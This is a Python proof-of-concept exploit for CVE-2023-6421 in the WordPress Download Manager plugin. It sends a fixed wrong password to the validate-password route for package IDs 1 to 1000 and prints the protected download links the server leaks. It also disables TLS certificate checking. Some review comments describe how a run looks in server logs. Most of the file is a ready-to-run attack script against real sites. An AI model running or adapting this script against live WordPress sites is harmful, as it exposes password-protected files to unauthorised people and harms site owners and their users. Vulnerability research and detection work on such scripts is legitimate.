POC / CVE-2023-6421.py PY
import argparse
import requests
import sys
import os
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Silences urllib3's InsecureRequestWarning, which would otherwise be emitted
# for every request made with TLS certificate verification disabled
# (verify=False in main()). With the warning off, nothing at runtime indicates
# that the server's certificate is not being checked.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
## Exploit script by @RandomRobbieBF

# Proxy URL exported to the process environment at import time. The default is
# an empty string, i.e. this script itself configures no proxy.
http_proxy = ""
os.environ.update({'HTTP_PROXY': http_proxy, 'HTTPS_PROXY': http_proxy})

# Help text shown by argparse. It names the affected component and gives the
# affected range as Download Manager releases below 3.2.83.
DESCRIPTION = (
    " CVE-2023-6421 Download Manager < 3.2.83 - Unauthenticated Protected"
    " File Download Password Leak | The plugin does not protect file"
    " download's passwords, leaking it upon receiving an invalid one."
)



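def main(url):
    """Check package IDs 1-1000 on one site for the CVE-2023-6421 behaviour.

    For every ID a single POST with a fixed, arbitrary password is sent to
    *url* and the ``downloadurl`` field of the JSON reply is printed. A value
    that starts with ``/wp-json/`` is reported as "no link generated"; any
    other value is printed as the response for that ID.

    For log review: one run appears server-side as up to 1000 consecutive
    POSTs to the same route from one client, with an incrementing
    ``__wpdm_ID``, a constant ``password`` value and a constant User-Agent.
    The description string in this file gives the affected range as Download
    Manager releases below 3.2.83.

    Args:
        url: Full URL of the ``/wp-json/wpdm/validate-password`` route.

    Exits the process with status 1 on the first transport error (including a
    timeout) or the first reply that is not JSON.
    """
    # Form fields sent with every request; only '__wpdm_ID' varies per ID.
    data_template = {
        'dataType': 'json',
        'execute': 'wpdm_getlink',
        'action': 'wpdm_ajax_call',
        'password': '123322'
    }
    # Built once: the header does not change between iterations.
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    }
    # Seconds to wait for the server before giving up; without a timeout a
    # stalled connection would block the run indefinitely.
    request_timeout = 30

    for wpdm_id in range(1, 1001):
        data = {**data_template, '__wpdm_ID': str(wpdm_id)}

        try:
            # NOTE(review): verify=False turns off TLS certificate checking, so
            # the reply is not authenticated and could be altered in transit.
            response = requests.post(
                url,
                data=data,
                verify=False,
                headers=headers,
                timeout=request_timeout,
            )
        except requests.exceptions.RequestException as e:
            print(f"An error occurred for ID {wpdm_id}: {e}")
            sys.exit(1)

        try:
            json_response = response.json()
        except ValueError:
            print(f"Response for ID {wpdm_id} is not in JSON format. Exiting.")
            sys.exit(1)

        # The reply may be valid JSON without being an object, or may lack the
        # field entirely; indexing it blindly raised KeyError/TypeError before.
        download_url = (
            json_response.get('downloadurl')
            if isinstance(json_response, dict)
            else None
        )
        if not isinstance(download_url, str):
            print(f"Response for ID {wpdm_id} has no usable 'downloadurl' field.")
            continue

        if download_url.startswith('/wp-json/'):
            print(f"No link generated for ID {wpdm_id}.")
            continue

        print(f"Response for ID {wpdm_id}: {download_url}")
        # NOTE(review): this matches the literal text 'op' (with single quotes)
        # in the raw body; confirm that is the intended marker.
        if "'op'" in response.text:
            print(json_response)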





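if __name__ == "__main__":
    # Command-line entry point: the site's base URL is the only argument.
    parser = argparse.ArgumentParser(description=DESCRIPTION)
    parser.add_argument(
        'url',
        type=str,
        help='The base URL to send the request to (e.g., https://example.com)',
    )
    args = parser.parse_args()

    # Strip trailing slashes so a base URL given as "https://host/" does not
    # produce "https://host//wp-json/..." when the route is appended.
    full_url = f"{args.url.rstrip('/')}/wp-json/wpdm/validate-password"

    main(full_url)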